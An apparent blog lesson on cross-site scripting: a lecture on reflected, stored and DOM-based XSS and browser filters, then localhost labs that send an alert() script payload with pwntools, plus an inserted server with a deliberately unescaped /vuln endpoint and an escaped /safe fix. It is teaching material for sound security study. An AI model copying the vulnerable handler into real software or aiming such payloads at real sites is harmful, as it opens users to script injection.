strangerRidingCaml


Real-world browser exploit

2. Cross-Site Scripting (XSS)

woddlwoddl 2024. 5. 14. 18:56

Cross-Site Scripting (XSS)

Lecture: Understanding XSS attacks and variations in different browsers.

<lecture>: XSS is one of the most prevalent vulnerability classes in web applications. It arises when untrusted input is written into a page without being encoded for the context it lands in, so the browser parses attacker-controlled markup or script as part of the site. The injected script runs in that site's origin: it can read the page's DOM, issue requests that carry the victim's cookies, and send whatever the page can see to the attacker. In this lecture we look at that mechanism and at what it means for web application security.

We will cover the three usual variants: reflected XSS, where a value from the request (typically a query parameter) is echoed straight back into the response; stored XSS, where the payload is persisted server-side (a comment, a profile field) and served to every user who later views it; and DOM-based XSS, where the server response is clean and client-side JavaScript itself writes untrusted data such as location.hash into the DOM. The distinction matters for mitigation: the first two are fixed by output encoding on the server, the third only by fixing the client-side code.

We will also discuss how the attack differs across Google Chrome, Mozilla Firefox and Microsoft Edge. The injection itself is browser-independent: the same request produces the same unencoded response whatever client sends it. What varies is what the browser does with that response. Chrome shipped a reflected-XSS filter (the XSS Auditor) until it was removed in Chrome 78; Internet Explorer and the original EdgeHTML-based Edge had a similar XSS Filter that Microsoft retired in 2018; Firefox never had one, and the current Chromium-based Edge behaves like Chrome. The differences that remain today are HTML-parsing quirks and the level of support for defences such as Content-Security-Policy.

By the end of this lecture, students will have a comprehensive understanding of XSS attacks and be equipped with the knowledge to identify, exploit, and mitigate XSS vulnerabilities in web applications.

Lab: Exploiting XSS vulnerabilities in Chrome, Firefox, and Edge.

Chrome Exploitation:

<defender side code>: To set up the defender side, we need a simple web server. Here's an example using Python's built-in HTTP server. Note that SimpleHTTPRequestHandler only serves files from the current directory and ignores the query string, so on its own it reflects nothing; for the lab to show XSS, the served page (or a handler in front of it) has to write the param value into the HTML without encoding it.


import http.server
import socketserver

PORT = 8000

# SimpleHTTPRequestHandler serves static files and never looks at the query
# string, so ?param= is not echoed; a reflecting page is needed for the lab.
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()

<exploit code>: The request that triggers a reflected XSS can be sent from Python with pwntools' raw socket tubes. Below is an example that puts the payload in the param query parameter and prints the response. The script only shows whether the server echoes the tag back unencoded; nothing in it executes JavaScript. For the alert to fire, Chrome has to load the same URL, and the request is identical for every browser:


from pwn import *
from urllib.parse import quote

host, port = 'localhost', 8000
payload = '<script>alert("XSS Attack!")</script>'

# Percent-encode the payload (a raw space in the request line gets a 400) and
# use CRLF line endings; the original's "\\n" sent literal backslashes.
request = (f'GET /?param={quote(payload)} HTTP/1.1\r\n'
           f'Host: {host}\r\nConnection: close\r\n\r\n')

r = remote(host, port)
r.send(request.encode())  # if the response echoes the tag unencoded, a browser loading this URL runs it
print(r.recvall().decode())
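The static server above never echoes the parameter, so the following is a target that does. It is an added example, not code from the original post: a small http.server handler that reflects ?param= raw on /vuln (the reflected XSS described in the lecture) and html-escaped on /safe (the fix), plus a probe that requests both and reports whether the payload came back byte-for-byte. The endpoint names, the page markup and the run_lab helper are my own assumptions. It serves as the defender side for all three browser labs; only the port differs.

```python
import html
import http.server
import socketserver
import threading
import urllib.parse
import urllib.request

# Same payload as the lab's exploit code.
PAYLOAD = '<script>alert("XSS Attack!")</script>'


def render_page(param: str, escape: bool) -> str:
    """Build the HTML returned for ?param=...

    escape=False reproduces the vulnerable behaviour: the query value is
    concatenated into the markup verbatim, so any tags it contains are parsed
    by the browser.  escape=True is the fix for an HTML-body context:
    html.escape turns < > & " ' into entities and the value renders as text.
    """
    shown = html.escape(param, quote=True) if escape else param
    return (
        "<!doctype html><html><body>"
        f"<p>You searched for: {shown}</p>"
        "</body></html>"
    )


class ReflectingHandler(http.server.BaseHTTPRequestHandler):
    """Reflects ?param= into the page: raw on /vuln, escaped on /safe (assumed paths)."""

    def do_GET(self):
        url = urllib.parse.urlsplit(self.path)
        param = urllib.parse.parse_qs(url.query).get("param", [""])[0]
        body = render_page(param, escape=(url.path == "/safe")).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the request log quiet
        pass


def reflected_unescaped(page: str, payload: str) -> bool:
    """True if the payload is in the response byte-for-byte: the server did not
    encode it, so a browser would parse and execute it."""
    return payload in page


def probe(path: str, port: int) -> bool:
    """Fetch path?param=PAYLOAD from the local server and report whether the
    payload came back unescaped.  Proxies are disabled so the request really
    goes to 127.0.0.1."""
    url = f"http://127.0.0.1:{port}{path}?param={urllib.parse.quote(PAYLOAD)}"
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url) as resp:
        return reflected_unescaped(resp.read().decode(), PAYLOAD)


def run_lab(port: int = 0) -> dict:
    """Start the reflecting server in a thread, probe both endpoints, stop it.
    port=0 lets the OS pick a free port; pass 8000 to match the lab."""
    with socketserver.TCPServer(("127.0.0.1", port), ReflectingHandler) as httpd:
        thread = threading.Thread(target=httpd.serve_forever, daemon=True)
        thread.start()
        try:
            actual_port = httpd.server_address[1]
            return {p: probe(p, actual_port) for p in ("/vuln", "/safe")}
        finally:
            httpd.shutdown()


if __name__ == "__main__":
    # Expected: {'/vuln': True, '/safe': False}
    print(run_lab())
```

Point the lab's pwntools script (or a browser) at /vuln?param=... to see the tag echoed and the alert fire; /safe returns the same text with the angle brackets as &lt; and &gt;. html.escape is only the right encoder for text inside the HTML body: a value landing inside a JavaScript string, a URL or an unquoted attribute needs the encoding for that context, which is exactly the distinction the lecture draws between the XSS variants.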
        

Firefox Exploitation:

<defender side code>: Similar to the Chrome setup, we can use Python's built-in HTTP server on a second port. The same caveat applies: the static handler does not reflect param, so the served page must do so for the lab to work.


import http.server
import socketserver

PORT = 8001

# Static file handler; it does not echo the query string by itself.
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()

<exploit code>: The request for Firefox is the same as for Chrome, since the injection happens on the server; only the port changes. Firefox has no built-in reflected-XSS filter, so an unencoded reflection executes as soon as the browser loads the URL:


from pwn import *
from urllib.parse import quote

host, port = 'localhost', 8001
payload = '<script>alert("XSS Attack!")</script>'

# Percent-encoded payload, CRLF line endings, blank line ending the headers.
request = (f'GET /?param={quote(payload)} HTTP/1.1\r\n'
           f'Host: {host}\r\nConnection: close\r\n\r\n')

r = remote(host, port)
r.send(request.encode())
print(r.recvall().decode())  # look for the tag echoed back unencoded

Edge Exploitation:

<defender side code>: Again, using Python's HTTP server, this time on port 8002; as before, a page that reflects param is required for the exploit to have any effect.


import http.server
import socketserver

PORT = 8002

# Static file handler; it does not echo the query string by itself.
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()

<exploit code>: Exploiting XSS in Edge follows the same principle. Current Edge is Chromium-based and, like Chrome, no longer ships an XSS filter, so the request below is identical apart from the port:


from pwn import *
from urllib.parse import quote

host, port = 'localhost', 8002
payload = '<script>alert("XSS Attack!")</script>'

# Percent-encoded payload, CRLF line endings, blank line ending the headers.
request = (f'GET /?param={quote(payload)} HTTP/1.1\r\n'
           f'Host: {host}\r\nConnection: close\r\n\r\n')

r = remote(host, port)
r.send(request.encode())
print(r.recvall().decode())  # look for the tag echoed back unencoded